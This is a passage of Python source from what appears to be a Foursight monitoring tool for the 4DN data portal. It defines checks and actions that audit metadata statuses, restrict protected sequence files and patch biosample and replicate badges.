problem_dict[title] = {f['@id']: {'status': opf_status_dict[f['uuid']]} for f in file_list}
if hg_dict.get(title):
problem_dict[title][hg_dict[title]] = {'status': opf_status_dict[hg_dict[title]]}
elif hg_dict.get(title) and STATUS_LEVEL[list(statuses)[0]] != STATUS_LEVEL[opf_status_dict[hg_dict[title]]]:
if not (list(statuses)[0] == 'pre-release' and opf_status_dict[hg_dict[title]] == 'released to lab'):
problem_dict[title] = {'files': list(statuses)[0],
'higlass_view_config': opf_status_dict[hg_dict[title]]}
elif STATUS_LEVEL[result['status']] < STATUS_LEVEL[list(statuses)[0]]:
problem_dict[title] = {result['@id']: result['status'], title: list(statuses)[0]}
for f in file_list:
if opf_linked_dict.get(f['uuid']):
for qm in opf_linked_dict[f['uuid']]:
if (STATUS_LEVEL[opf_other_dict[qm]] != STATUS_LEVEL[opf_status_dict[f['uuid']]]):
if title not in problem_dict:
problem_dict[title] = {}
if f['@id'] not in problem_dict[title]:
problem_dict[title][f['@id']] = {}
problem_dict[title][f['@id']]['quality_metric'] = {
'uuid': opf_linked_dict[f['uuid']], 'status': opf_other_dict[qm]
}
if problem_dict:
check.full_output[result['@id']] = problem_dict
if check.full_output:
check.brief_output = list(check.full_output.keys())
check.status = 'WARN'
check.summary = 'Other processed files with status mismatches found'
check.description = ('{} Experiment Sets found with status mismatches in '
'other processed files'.format(len(check.brief_output)))
else:
check.status = "PASS"
check.summary = 'All other processed files have matching statuses'
check.description = 'No Experiment Sets found with status mismatches in other processed files'
return check
@check_function()
def check_validation_errors(connection, **kwargs):
'''
Counts number of items in fourfront with schema validation errors,
returns link to search if found.
'''
check = CheckResult(connection, 'check_validation_errors')
search_url = 'search/?validation_errors.name!=No+value&type=Item'
results = ff_utils.search_metadata(search_url + '&field=@id', key=connection.ff_keys)
if results:
types = {item for result in results for item in result['@type'] if item != 'Item'}
check.status = 'WARN'
check.summary = 'Validation errors found'
check.description = ('{} items found with validation errors, comprising the following '
'item types: {}. \nFor search results see link below.'.format(
len(results), ', '.join(list(types))))
check.ff_link = connection.ff_server + search_url
else:
check.status = 'PASS'
check.summary = 'No validation errors'
check.description = 'No validation errors found.'
return check
def _get_all_other_processed_files(item):
toignore = []
# get directly linked other processed files
for pfinfo in item.get('properties').get('other_processed_files', []):
toignore.extend([pf for pf in pfinfo.get('files', []) if pf is not None])
# toignore.extend([pf['quality_metric'] for pf in pfinfo.get('files', []) if pf and pf.get('quality_metric')])
# qcs = [pf for pf in pfinfo.get('files', []) if pf is not None]
hgv = pfinfo.get('higlass_view_config')
if hgv:
toignore.append(hgv)
# experiment sets can also have linked opfs from experiment
for pfinfo in item['embedded'].get('other_processed_files', []):
toignore.extend([pf['quality_metric']['uuid'] for pf in pfinfo.get('files') if pf and pf.get('quality_metric')])
expts = item.get('embedded').get('experiments_in_set')
if expts is not None:
for exp in expts:
opfs = exp.get('other_processed_files')
if opfs is not None:
for pfinfo in opfs:
toignore.extend([pf.get('uuid') for pf in pfinfo.get('files', []) if pf is not None])
toignore.extend([pf['quality_metric']['uuid'] for pf in pfinfo.get('files', []) if pf and pf.get('quality_metric')])
hgv = pfinfo.get('higlass_view_config')
if hgv:
toignore.append(hgv)
return toignore
@check_function()
def check_bio_feature_organism_name(connection, **kwargs):
'''
Attempts to identify an organism to add to the organism_name field in BioFeature items
checks the linked genes or the genomic regions and then description
'''
check = CheckResult(connection, 'check_bio_feature_organism_name')
check.action = "patch_bio_feature_organism_name"
# create some mappings
organism_search = 'search/?type=Organism'
organisms = ff_utils.search_metadata(organism_search, key=connection.ff_keys)
orgn2name = {o.get('@id'): o.get('name') for o in organisms}
# add special cases
orgn2name['unspecified'] = 'unspecified'
orgn2name['multiple organisms'] = 'multiple organisms'
genome2orgn = {o.get('genome_assembly'): o.get('@id') for o in organisms if 'genome_assembly' in o}
gene_search = 'search/?type=Gene'
genes = ff_utils.search_metadata(gene_search, key=connection.ff_keys)
gene2org = {g.get('@id'): g.get('organism').get('@id') for g in genes}
# get all BioFeatures
biofeat_search = 'search/?type=BioFeature'
biofeatures = ff_utils.search_metadata(biofeat_search, key=connection.ff_keys)
matches = 0
name_trumps_guess = 0
mismatches = 0
to_patch = {}
brief_report = []
to_report = {'name_trumps_guess': {}, 'lost_and_found': {}, 'orphans': {}, 'mismatches': {}}
for biofeat in biofeatures:
linked_orgn_name = None
orgn_name = biofeat.get('organism_name')
biogenes = biofeat.get('relevant_genes')
if biogenes is not None:
borgns = [gene2org.get(g.get('@id')) for g in biogenes if '@id' in g]
linked_orgn_name = _get_orgname_from_atid_list(borgns, orgn2name)
if not linked_orgn_name: # didn't get it from genes - try genomic regions
gen_regions = biofeat.get('genome_location')
if gen_regions is not None:
grorgns = []
for genreg in gen_regions:
assembly_in_dt = False
gr_dt = genreg.get('display_title')
for ga, orgn in genome2orgn.items():
if ga in gr_dt:
grorgns.append(orgn)
assembly_in_dt = True
break
if not assembly_in_dt:
gr_res = ff_utils.get_es_metadata([genreg.get('uuid')],
key=connection.ff_keys, sources=['properties.genome_assembly'])
try:
gr_ass = gr_res[0].get('properties').get('genome_assembly')
except AttributeError:
gr_ass = None
if gr_ass is not None:
for ga, orgn in genome2orgn.items():
if ga == gr_ass:
grorgns.append(orgn)
linked_orgn_name = _get_orgname_from_atid_list(grorgns, orgn2name)
if not linked_orgn_name: # and finally try Description
desc = biofeat.get('description')
if desc is not None:
for o in orgn2name.values():
if o in desc.lower():
linked_orgn_name = o
break
# we've done our best now check and create output
bfuuid = biofeat.get('uuid')
bfname = biofeat.get('display_title')
if not orgn_name:
if linked_orgn_name:
to_patch[bfuuid] = {'organism_name': linked_orgn_name}
brief_report.append('{} MISSING ORGANISM - PATCH TO {}'.format(bfname, linked_orgn_name))
to_report['lost_and_found'].update({bfuuid: linked_orgn_name})
else:
brief_report.append('{} MISSING ORGANISM - NO GUESS'.format(bfname))
to_report['orphans'].update({bfuuid: None})
else:
if linked_orgn_name:
if orgn_name != linked_orgn_name:
if linked_orgn_name == 'unspecified' or orgn_name == 'engineered reagent':
# unspecified here means an organism or multiple coule not be found from linked genes or other criteria
# for engineered reagent may find a linked name depending on what is linked to bio_feature
# usually want to keep the given 'engineered reagent' label but warrants occasional review
name_trumps_guess += 1
to_report['name_trumps_guess'].update({bfuuid: (orgn_name, linked_orgn_name)})
elif orgn_name == 'unspecified': # patch if a specific name is found
to_patch[bfuuid] = {'organism_name': linked_orgn_name}
to_report['mismatches'].update({bfuuid: (orgn_name, linked_orgn_name)})
brief_report.append('{}: CURRENT {} GUESS {} - WILL PATCH!'.format(bfname, orgn_name, linked_orgn_name))
else:
mismatches += 1
to_report['mismatches'].update({bfuuid: (orgn_name, linked_orgn_name)})
brief_report.append('{}: CURRENT {} GUESS {}'.format(bfname, orgn_name, linked_orgn_name))
else:
matches += 1
else:
to_report['name_trumps_guess'].update({bfuuid: (orgn_name, None)})
name_trumps_guess += 1
brief_report.sort()
cnt_rep = [
'MATCHES: {}'.format(matches),
'MISMATCHES TO CHECK: {}'.format(mismatches),
'OK MISMATCHES: {}'.format(name_trumps_guess)
]
check.brief_output = cnt_rep + brief_report
check.full_output = {}
if brief_report:
check.summary = 'Found BioFeatures with organism_name that needs attention'
check.status = 'WARN'
check.allow_action = True
else:
check.status = 'PASS'
check.summary = 'BioFeature organism_name looks good'
if to_report:
to_report.update({'counts': cnt_rep})
check.full_output.update({'info': to_report})
if to_patch:
check.full_output.update({'to_patch': to_patch})
return check
def _get_orgname_from_atid_list(atids, orgn2name):
org_atid = [x for x in list(set(atids)) if x is not None]
if not org_atid:
org_atid = 'unspecified'
elif len(org_atid) == 1:
org_atid = org_atid[0]
else:
org_atid = 'multiple organisms'
return orgn2name.get(org_atid)
@action_function()
def patch_bio_feature_organism_name(connection, **kwargs):
action = ActionResult(connection, 'patch_bio_feature_organism_name')
action_logs = {'patch_failure': [], 'patch_success': []}
check_res = action.get_associated_check_result(kwargs)
output = check_res.get('full_output')
patches = output.get('to_patch')
if patches:
for uid, val in patches.items():
try:
res = ff_utils.patch_metadata(val, uid, key=connection.ff_keys)
except:
action_logs['patch_failure'].append(uid)
else:
if res.get('status') == 'success':
action_logs['patch_success'].append(uid)
else:
action_logs['patch_failure'].append(uid)
action.status = 'DONE'
action.output = action_logs
return action
@check_function()
def check_fastq_read_id(connection, **kwargs):
'''
Reports if there are uploaded fastq files with integer read ids
'''
check = CheckResult(connection, 'check_fastq_read_id')
check.description = 'Reports fastq files that have integer read ids uploaded after 2020-04-13'
check.summary = 'No fastq files with integer ids'
check.full_output = {}
check.status = 'PASS'
query = '/search/?date_created.from=2020-04-13&file_format.file_format=fastq&status=uploaded&type=FileFastq'
res = ff_utils.search_metadata(query, key=connection.ff_keys)
if not res:
return check
target_files = {}
for a_re in res:
if a_re.get('file_first_line'):
read_id = a_re['file_first_line'].split(' ')[0][1:]
if read_id.isnumeric():
if a_re.get('experiments'):
exp = a_re['experiments'][0]['@id']
exp_title = a_re['experiments'][0]['display_title']
else:
exp = 'No experiment associated'
exp_title = ''
if exp not in target_files:
target_files[exp] = {'title': exp_title, 'files': []}
target_files[exp]['files'].append(a_re['accession'])
if target_files:
check.status = 'WARN'
check.summary = '%s fastq files have integer read ids' % (sum([len(v['files']) for i, v in target_files.items()]))
check.full_output = target_files
return check
@check_function()
def released_protected_data_files(connection, **kwargs):
'''
Check if fastq or bam files from IndividualHuman with protected_data=True
have a visible status
'''
check = CheckResult(connection, 'released_protected_data_files')
visible_statuses = ['released to project', 'released', 'archived to project', 'archived', 'replaced']
formats = ['fastq', 'bam']
query = 'search/?type=File'
query += ''.join(['&file_format.file_format=' + f for f in formats])
query += '&experiments.biosample.biosource.individual.protected_data=true'
query += ''.join(['&status=' + s for s in visible_statuses])
query += '&field=file_format&field=status&field=open_data_url'
res = ff_utils.search_metadata(query, key=connection.ff_keys)
files = {'visible': []}
files_with_open_data_url = False
for a_file in res:
file_report = {
'@id': a_file['@id'],
'file_format': a_file['file_format']['file_format'],
'file_status': a_file['status']}
if a_file.get('open_data_url'):
files_with_open_data_url = True
file_report['open_data_url'] = a_file['open_data_url']
files['visible'].append(file_report)
if files['visible']:
check.status = 'WARN'
check.summary = 'Found visible sequence files that should be restricted'
check.description = '%s fastq or bam files from restricted individuals found with status: %s' % (len(files['visible']), str(visible_statuses).strip('[]'))
check.action_message = 'Will attempt to patch %s files to status=restricted' % len(files['visible'])
check.allow_action = True
if files_with_open_data_url:
check.description += '\nNOTE: some files are in AWS Open Data bucket and should be moved manually'
else:
check.status = 'PASS'
check.summary = 'No unrestricted fastq or bam files found from individuals with protected_data'
check.description = 'No fastq or bam files from restricted individuals found with status: %s' % str(visible_statuses).strip('[]')
check.brief_output = {'visible': '%s files' % len(files['visible'])}
check.full_output = files
check.action = 'restrict_files'
return check
@check_function()
def released_output_from_restricted_input(connection, **kwargs):
'''
Check if fastq or bam files produced by workflows with restricted input
files (typically because deriving from HeLa cells) have a visible status.
In addition, check if any fastq or bam processed file (with visible
status) is not output of a workflow ('unlinked'). If this happens, the
check cannot ensure that all processed files are analyzed.
'''
check = CheckResult(connection, 'released_output_from_restricted_input')
visible_statuses = ['released to project', 'released', 'archived to project', 'archived', 'replaced']
formats = ['fastq', 'bam']
query_wfr = 'search/?type=WorkflowRun'
query_wfr += '&input_files.value.status=restricted'
query_wfr += ''.join(['&output_files.value.status=' + s for s in visible_statuses])
query_wfr += ''.join(['&output_files.value.file_format.display_title=' + f for f in formats])
query_wfr += '&field=output_files'
res_wfr = ff_utils.search_metadata(query_wfr, key=connection.ff_keys)
# this returns wfrs that have AT LEAST one output file with these values
files = {'visible': [], 'unlinked': []}
files_with_open_data_url = False
for a_wfr in res_wfr:
for a_file in a_wfr.get('output_files', []):
if a_file.get('value'):
format = a_file['value']['file_format']['display_title']
status = a_file['value']['status']
if format in formats and status in visible_statuses:
file_report = {
'@id': a_file['value']['@id'],
'file_format': format,
'file_status': status}
if a_file['value'].get('open_data_url'):
files_with_open_data_url = True
file_report['open_data_url'] = a_file['value']['open_data_url']
files['visible'].append(file_report)
# search for visible fastq or bam processed files that are not output of any workflow
query_pf = 'search/?type=FileProcessed&workflow_run_outputs.workflow.title=No+value'
query_pf += ''.join(['&status=' + st for st in visible_statuses])
query_pf += ''.join(['&file_format.file_format=' + f for f in formats])
query_pf += '&field=file_format&field=status&field=open_data_url'
res_pf = ff_utils.search_metadata(query_pf, key=connection.ff_keys)
for a_file in res_pf:
file_report = {
'@id': a_file['@id'],
'file_format': a_file['file_format']['display_title'],
'file_status': a_file['status']}
if a_file.get('open_data_url'):
files_with_open_data_url = True
file_report['open_data_url'] = a_file['open_data_url']
files['unlinked'].append(file_report)
if files['visible'] or files['unlinked']:
check.status = 'WARN'
check.summary = "Problematic processed files found"
check.description = "Found %s problematic FASTQ or BAM processed files: 'visible' files should be restricted" % (len(files['visible']) + len(files['unlinked']))
if files['unlinked']:
check.description += "; 'unlinked' files are not output of any workflow, therefore cannot be analyzed (consider linking)"
if files['visible']:
check.allow_action = True
check.action_message = "Will attempt to patch %s 'visible' files to status=restricted" % len(files['visible'])
if files_with_open_data_url:
check.description += '\nNOTE: some files are in AWS Open Data bucket and should be moved manually'
else:
check.status = 'PASS'
check.summary = "No problematic processed files found"
check.description = "No visible output files found from wfr with restricted files as input"
check.full_output = files
check.brief_output = {'visible': '%s files' % len(files['visible']),
'unlinked': '%s files' % len(files['unlinked'])}
check.action = 'restrict_files'
return check
@action_function()
def restrict_files(connection, **kwargs):
'''
Patch the status of visible sequence files to "restricted"
'''
action = ActionResult(connection, 'restrict_files')
check_res = action.get_associated_check_result(kwargs)
files_to_patch = check_res['full_output']['visible']
action_logs = {'patch_success': [], 'patch_failure': []}
patch = {'status': 'restricted'}
for a_file in files_to_patch:
try:
ff_utils.patch_metadata(patch, a_file['uuid'], key=connection.ff_keys)
except Exception as e:
action_logs['patch_failure'].append({a_file['uuid']: str(e)})
else:
action_logs['patch_success'].append(a_file['uuid'])
if action_logs['patch_failure']:
action.status = 'FAIL'
else:
action.status = 'DONE'
action.output = action_logs
return action
@check_function(days_delay=14)
def external_submission_but_missing_dbxrefs(connection, **kwargs):
''' Check if items with external_submission also have dbxrefs.
When exporting metadata for submission to an external repository,
external_submission is patched. After some time (delay), the corresponding
dbxref should also have been received and patched.
'''
check = CheckResult(connection, 'external_submission_but_missing_dbxrefs')
delay = kwargs.get('days_delay')
try:
delay = int(delay)
except (ValueError, TypeError):
delay = 14
date_now = datetime.datetime.now(datetime.timezone.utc)
days_diff = datetime.timedelta(days=delay)
to_date = datetime.datetime.strftime(date_now - days_diff, "%Y-%m-%d %H:%M")
query = ('search/?type=ExperimentSet&type=Experiment&type=Biosample&type=FileFastq' +
'&dbxrefs=No+value&external_submission.date_exported.to=' + to_date)
items = ff_utils.search_metadata(query + '&field=dbxrefs&field=external_submission', key=connection.ff_keys)
grouped_results = {}
if items:
for i in items:
grouped_results.setdefault(i['@type'][0], []).append(i['@id'])
check.brief_output = {i_type: len(ids) for i_type, ids in grouped_results.items()}
check.full_output = grouped_results
check.status = 'WARN'
check.summary = 'Items missing dbxrefs found'
check.description = '{} items exported for external submission more than {} days ago but still without dbxrefs'.format(len(items), delay)
else:
check.status = 'PASS'
check.summary = 'No items missing dbxrefs found'
check.description = 'All items exported for external submission more than {} days ago have dbxrefs'.format(delay)
return check
```
#### File: chalicelib/checks/badge_checks.py
```python
import re
import requests
import datetime
import json
from dcicutils import ff_utils
# Use confchecks to import decorators object and its methods for each check module
# rather than importing check_function, action_function, CheckResult, ActionResult
# individually - they're now part of class Decorators in foursight-core::decorators
# that requires initialization with foursight prefix.
from .helpers.confchecks import *
REV = ['in review by lab', 'submission in progress']
REV_KEY = 'In review by lab/Submission in progress'
RELEASED_KEY = 'Released/Released to project/Pre-release/Archived'
def stringify(item):
if isinstance(item, str):
return item
elif isinstance(item, list):
return '[' + ', '.join([stringify(i) for i in item]) + ']'
elif isinstance(item, dict):
return '{' + ', '.join(['{}: {}'.format(k, str(v)) for k, v in sorted(item.items())]) + '}'
elif isinstance(item, float) and abs(item - int(item)) == 0:
return str(int(item))
return str(item)
def compare_badges(obj_ids, item_type, badge, ff_keys):
'''
Compares items that should have a given badge to items that do have the given badge.
Used for badges that utilize a single message choice.
Input (first argument) should be a list of item @ids.
'''
search_url = 'search/?type={}&badges.badge.@id=/badges/{}/'.format(item_type, badge)
has_badge = ff_utils.search_metadata(search_url + '&frame=object', key=ff_keys)
needs_badge = []
badge_ok = []
remove_badge = {}
for item in has_badge:
if item['@id'] in obj_ids:
# handle differences in badge messages
badge_ok.append(item['@id'])
else:
keep = [badge_dict for badge_dict in item['badges'] if badge not in badge_dict['badge']]
remove_badge[item['@id']] = keep
for other_item in obj_ids:
if other_item not in badge_ok:
needs_badge.append(other_item)
return needs_badge, remove_badge, badge_ok
def compare_badges_and_messages(obj_id_dict, item_type, badge, ff_keys):
'''
Compares items that should have a given badge to items that do have the given badge.
Also compares badge messages to see if the message is the right one or needs to be updated.
Input (first argument) should be a dictionary of item's @id and the badge message it should have.
'''
search_url = 'search/?type={}&badges.badge.@id=/badges/{}/'.format(item_type, badge)
has_badge = ff_utils.search_metadata(search_url + '&frame=object', key=ff_keys)
needs_badge = {}
badge_edit = {}
badge_ok = []
remove_badge = {}
for item in has_badge:
if item['@id'] in obj_id_dict.keys():
# handle differences in badge messages
for a_badge in item['badges']:
if a_badge['badge'].endswith(badge + '/'):
if a_badge.get('messages') == obj_id_dict[item['@id']]:
badge_ok.append(item['@id'])
else:
if a_badge.get('message'):
del a_badge['message']
a_badge['messages'] = obj_id_dict[item['@id']]
badge_edit[item['@id']] = item['badges']
break
else:
this_badge = [a_badge for a_badge in item['badges'] if badge in a_badge['badge']][0]
item['badges'].remove(this_badge)
remove_badge[item['@id']] = item['badges']
for key, val in obj_id_dict.items():
if key not in badge_ok + list(badge_edit.keys()):
needs_badge[key] = val
return needs_badge, remove_badge, badge_edit, badge_ok
def patch_badges(full_output, badge_name, ff_keys, single_message=''):
'''
General function for patching badges.
For badges with single message choice:
- single_message kwarg should be assigned a string to be used for the badge message;
- full_output[output_keys[0]] should be a list of item @ids;
- no badges are edited, they are only added or removed.
For badges with multiple message options:
- single_message kwarg should not be used, but left as empty string.
- full_output[output_keys[0]] should be a list of item @ids and message to patch into badge.
- badges can also be edited to change the message.
'''
patches = {'add_badge_success': [], 'add_badge_failure': [],
'remove_badge_success': [], 'remove_badge_failure': []}
badge_id = '/badges/' + badge_name + '/'
output_keys = ['Add badge', 'Remove badge']
if isinstance(full_output[output_keys[0]], list):
add_list = full_output[output_keys[0]]
elif isinstance(full_output[output_keys[0]], dict):
patches['edit_badge_success'] = []
patches['edit_badge_failure'] = []
output_keys.append('Keep badge and edit messages')
add_list = full_output[output_keys[0]].keys()
for add_key in add_list:
add_result = ff_utils.get_metadata(add_key + '?frame=object&field=badges', key=ff_keys)
badges = add_result['badges'] if add_result.get('badges') else []
badges.append({'badge': badge_id, 'messages': [single_message] if single_message else full_output[output_keys[0]][add_key]})
if [b['badge'] for b in badges].count(badge_id) > 1:
# print an error message?
patches['add_badge_failure'].append('{} already has badge'.format(add_key))
continue
try:
response = ff_utils.patch_metadata({"badges": badges}, add_key[1:], key=ff_keys)
if response['status'] == 'success':
patches['add_badge_success'].append(add_key)
else:
patches['add_badge_failure'].append(add_key)
except Exception:
patches['add_badge_failure'].append(add_key)
for remove_key, remove_val in full_output[output_keys[1]].items():
# delete field if no badges?
try:
if remove_val:
response = ff_utils.patch_metadata({"badges": remove_val}, remove_key, key=ff_keys)
else:
response = ff_utils.patch_metadata({}, remove_key + '?delete_fields=badges', key=ff_keys)
if response['status'] == 'success':
patches['remove_badge_success'].append(remove_key)
else:
patches['remove_badge_failure'].append(remove_key)
except Exception:
patches['remove_badge_failure'].append(remove_key)
if len(output_keys) > 2:
for edit_key, edit_val in full_output[output_keys[2]].items():
try:
response = ff_utils.patch_metadata({"badges": edit_val}, edit_key, key=ff_keys)
if response['status'] == 'success':
patches['edit_badge_success'].append(edit_key)
else:
patches['edit_badge_failure'].append(edit_key)
except Exception:
patches['edit_badge_failure'].append(edit_key)
return patches
@check_function()
def yellow_flag_biosamples(connection, **kwargs):
'''
Checks biosamples for required metadata:
1. Culture harvest date, doubling number, passage number, culture duration
2. Morphology image
3. Karyotyping (authentication doc or string field) for any biosample derived
from pluripotent cell line that has been passaged more than 10 times beyond
the first thaw of the original vial.
4. Differentiation authentication for differentiated cells.
5. HAP-1 biosamples must have ploidy authentication.
'''
check = CheckResult(connection, 'yellow_flag_biosamples')
results = ff_utils.search_metadata('search/?type=Biosample', key=connection.ff_keys)
flagged = {}
check.brief_output = {RELEASED_KEY: {}, REV_KEY: []}
for result in results:
messages = []
bs_types = [bs.get('biosource_type') for bs in result.get('biosource', [])]
karyotype = False
diff_auth = False
ploidy = False
bccs = result.get('cell_culture_details', [])
if not bccs:
if len([t for t in bs_types if t in ['primary cell', 'tissue', 'multicellular organism']]) != len(bs_types):
messages.append('Biosample missing Cell Culture Details')
else:
for bcc in bccs:
for item in [
'culture_harvest_date', 'doubling_number', 'passage_number', 'culture_duration', 'morphology_image'
]:
if not bcc.get(item):
messages.append('Biosample missing {}'.format(item))
if bcc.get('karyotype'):
karyotype = True
for protocol in bcc.get('authentication_protocols', []):
protocol_item = ff_utils.get_metadata(protocol['@id'], key=connection.ff_keys)
auth_type = protocol_item.get('protocol_classification')
if not karyotype and auth_type == 'Karyotype Authentication':
karyotype = True
elif auth_type == 'Differentiation Authentication':
diff_auth = True
elif auth_type == 'Ploidy Authentication':
ploidy = True
passages = bcc.get('passage_number', 0)
if 'tem cell' in ''.join(bs_types) and not karyotype:
if passages > 10:
messages.append('Biosample is a stem cell line over 10 passages but missing karyotype')
elif not passages:
messages.append('Biosample is a stem cell line with unknown passage number missing karyotype')
if result.get('biosample_type') == 'In vitro differentiated cells' and not diff_auth:
messages.append('Differentiated biosample missing differentiation authentication')
if 'HAP-1' in result.get('biosource_summary') and not ploidy:
messages.append('HAP-1 biosample missing ploidy authentication')
if messages:
messages = [messages[i] for i in range(len(messages)) if messages[i] not in messages[:i]]
if result.get('status') in REV:
check.brief_output[REV_KEY].append('{} missing {}'.format(
result['@id'], ', '.join(list(set([item[item.index('missing') + 8:] for item in messages])))
))
else:
flagged[result['@id']] = messages
to_add, to_remove, to_edit, ok = compare_badges_and_messages(
flagged, 'Biosample', 'biosample-metadata-incomplete', connection.ff_keys
)
check.action = 'patch_biosample_warning_badges'
if to_add or to_remove or to_edit:
check.status = 'WARN'
check.summary = 'Yellow flag biosample badges need patching'
check.description = '{} biosamples need warning badges patched'.format(
len(to_add.values()) + len(to_remove.values()) + len(to_edit.values())
)
check.allow_action = True
else:
check.status = 'PASS'
check.summary = 'Yellow flag biosample badges up-to-date'
check.description = 'No yellow flag biosample badges need patching'
check.full_output = {'Add badge': to_add,
'Remove badge': to_remove,
'Keep badge and edit messages': to_edit,
'Keep badge (no change)': ok}
check.brief_output[RELEASED_KEY] = {
'Add badge': ['{} missing {}'.format(
k, ', '.join([item[item.index('missing') + 8:] for item in flagged[k]])
) for k in to_add.keys()],
'Remove badge': list(to_remove.keys()),
'Keep badge and edit messages': ['{} missing {}'.format(
k, ', '.join([item[item.index('missing') + 8:] for item in flagged[k]])
) for k in to_edit.keys()]
}
return check
@action_function()
def patch_biosample_warning_badges(connection, **kwargs):
action = ActionResult(connection, 'patch_biosample_warning_badges')
bs_check_result = action.get_associated_check_result(kwargs)
action.output = patch_badges(
bs_check_result['full_output'], 'biosample-metadata-incomplete', connection.ff_keys
)
if [action.output[key] for key in list(action.output.keys()) if 'failure' in key and action.output[key]]:
action.status = 'FAIL'
action.description = 'Some items failed to patch. See below for details.'
else:
action.status = 'DONE'
action.description = 'Patching badges successful for yellow flag biosamples.'
return action
@check_function()
def gold_biosamples(connection, **kwargs):
'''
Gold level commendation criteria:
1. Tier 1 or Tier 2 Cells obtained from the approved 4DN source and grown
precisely according to the approved SOP including any additional
authentication (eg. HAP-1 haploid line requires ploidy authentication).
2. All required metadata present (does not have a biosample warning badge).
'''
check = CheckResult(connection, 'gold_biosamples')
search_url = ('search/?biosource.cell_line_tier=Tier+1&biosource.cell_line_tier=Tier+2'
'&type=Biosample&badges.badge.warning=No+value')
results = ff_utils.search_metadata(search_url, key=connection.ff_keys)
gold = []
for result in results:
# follows SOP w/ no deviations
sop = True if all([bcc.get('follows_sop', '') == 'Yes' for bcc in result.get('cell_culture_details', [])]) else False
if sop and result.get('status') not in REV:
gold.append(result['@id'])
to_add, to_remove, ok = compare_badges(gold, 'Biosample', 'gold-biosample', connection.ff_keys)
check.action = 'patch_gold_biosample_badges'
if to_add or to_remove:
check.status = 'WARN'
check.summary = 'Gold biosample badges need patching'
check.description = '{} biosamples need gold badges patched. '.format(len(to_add) + len(to_remove.keys()))
check.description += 'Yellow_flag_biosamples check must pass before patching.'
yellow_check = CheckResult(connection, 'yellow_flag_biosamples')
latest_yellow = yellow_check.get_latest_result()
if latest_yellow['status'] == 'PASS':
check.allow_action = True
else:
check.status = 'PASS'
check.summary = 'Gold biosample badges up-to-date'
check.description = 'No gold biosample badges need patching'
check.full_output = {'Add badge': to_add,
'Remove badge': to_remove,
'Keep badge (no change)': ok}
return check
@action_function()
def patch_gold_biosample_badges(connection, **kwargs):
action = ActionResult(connection, 'patch_gold_biosample_badges')
gold_check_result = action.get_associated_check_result(kwargs)
action.output = patch_badges(
gold_check_result['full_output'], 'gold-biosample', connection.ff_keys,
single_message=('Biosample receives gold status for being a 4DN Tier 1 or Tier 2'
' cell line that follows the approved SOP and contains all of the '
'pertinent metadata information as required by the 4DN Samples working group.')
)
if [action.output[key] for key in list(action.output.keys()) if 'failure' in key and action.output[key]]:
action.status = 'FAIL'
action.description = 'Some items failed to patch. See below for details.'
else:
action.status = 'DONE'
action.description = 'Patching badges successful for yellow flag biosamples.'
return action
@check_function()
def repsets_have_bio_reps(connection, **kwargs):
'''
Check for replicate experiment sets that have one of the following issues:
1) Only a single biological replicate (includes sets with single experiment)
2) Biological replicate numbers that are not in sequence
3) Technical replicate numbers that are not in sequence
Action patches badges with a message detailing which of the above issues is relevant.
'''
check = CheckResult(connection, 'repsets_have_bio_reps')
results = ff_utils.search_metadata('search/?type=ExperimentSetReplicate&frame=object',
key=connection.ff_keys, page_limit=50)
audits = {
REV_KEY: {'single_biorep': [], 'biorep_nums': [], 'techrep_nums': []},
RELEASED_KEY: {'single_biorep': [], 'biorep_nums': [], 'techrep_nums': []}
}
by_exp = {}
for result in results:
rep_dict = {}
exp_audits = []
if result.get('replicate_exps'):
rep_dict = {}
for exp in result['replicate_exps']:
if exp['bio_rep_no'] in rep_dict.keys():
rep_dict[exp['bio_rep_no']].append(exp['tec_rep_no'])
else:
rep_dict[exp['bio_rep_no']] = [exp['tec_rep_no']]
if rep_dict:
if result.get('status') in REV:
audit_key = REV_KEY
else:
audit_key = RELEASED_KEY
# check if single biological replicate
if len(rep_dict.keys()) == 1:
# this tag labels an ExpSet with many replicates, but only one present in the database (typically imaging datasets)
if 'many_replicates' in result.get('tags', []): # skip false positive
continue
audits[audit_key]['single_biorep'].append(result['@id'])
exp_audits.append('Replicate set contains only a single biological replicate')
# check if bio rep numbers not in sequence
if sorted(list(rep_dict.keys())) != list(range(min(rep_dict.keys()), max(rep_dict.keys()) + 1)):
audits[audit_key]['biorep_nums'].append('{} - bio rep #s:'
' {}'.format(result['@id'], str(sorted(list(rep_dict.keys())))))
exp_audits.append('Biological replicate numbers are not in sequence')
# check if tech rep numbers not in sequence
for key, val in rep_dict.items():
if sorted(val) != list(range(min(val), max(val) + 1)):
audits[audit_key]['techrep_nums'].append('{} - tech rep #s of biorep {}:'
' {}'.format(result['@id'], key, str(sorted(val))))
exp_audits.append('Technical replicate numbers of biological replicate {}'
' are not in sequence'.format(key))
if exp_audits and result.get('status') not in REV:
by_exp[result['@id']] = sorted(exp_audits)
to_add, to_remove, to_edit, ok = compare_badges_and_messages(by_exp, 'ExperimentSetReplicate',
'replicate-numbers', connection.ff_keys)
check.action = 'patch_badges_for_replicate_numbers'
if to_add or to_remove or to_edit:
check.status = 'WARN'
check.summary = 'Replicate number badges need patching'
check.description = '{} replicate experiment sets need replicate badges patched'.format(
len(to_add.values()) + len(to_remove.values()) + len(to_edit.values())
)
check.allow_action = True
else:
check.status = 'PASS'
check.summary = 'Replicate number badges up-to-date'
check.description = 'No replicate number badges need patching'
check.full_output = {'Add badge': to_add,
'Remove badge': to_remove,
'Keep badge and edit messages': to_edit,
'Keep badge (no change)': ok}
check.brief_output = {REV_KEY: audits[REV_KEY]}
check.brief_output[RELEASED_KEY] = {
k: {'single_biorep': [], 'biorep_nums': [], 'techrep_nums': []} for k in check.full_output.keys()
}
for k, v in audits[RELEASED_KEY].items():
for item in v:
name = item.split(' ')[0]
for key in ["Add badge", 'Remove badge', 'Keep badge and edit messages']:
if name in check.full_output[key].keys():
check.brief_output[RELEASED_KEY][key][k].append(item)
if name in check.full_output['Keep badge (no change)']:
check.brief_output[RELEASED_KEY]['Keep badge (no change)'][k].append(item)
return check
@action_function()
def patch_badges_for_replicate_numbers(connection, **kwargs):
action = ActionResult(connection, 'patch_badges_for_replicate_numbers')
rep_check_result = action.get_associated_check_result(kwargs)
action.output = patch_badges(rep_check_result['full_output'], 'replicate-numbers', connection.ff_keys)
if [action.output[key] for key in list(action.output.keys()) if 'failure' in key and action.output[key]]:
action.status = 'FAIL'
action.description = 'Some items failed to patch. See below for details.'
else:
action.status = 'DONE'
action.description = 'Patching badges successful for replicate numbers'
return action
@check_function()
def exp_has_raw_files(connection, **kwargs):
'''
Check for sequencing experiments that don't have raw files
Action patches badges
'''
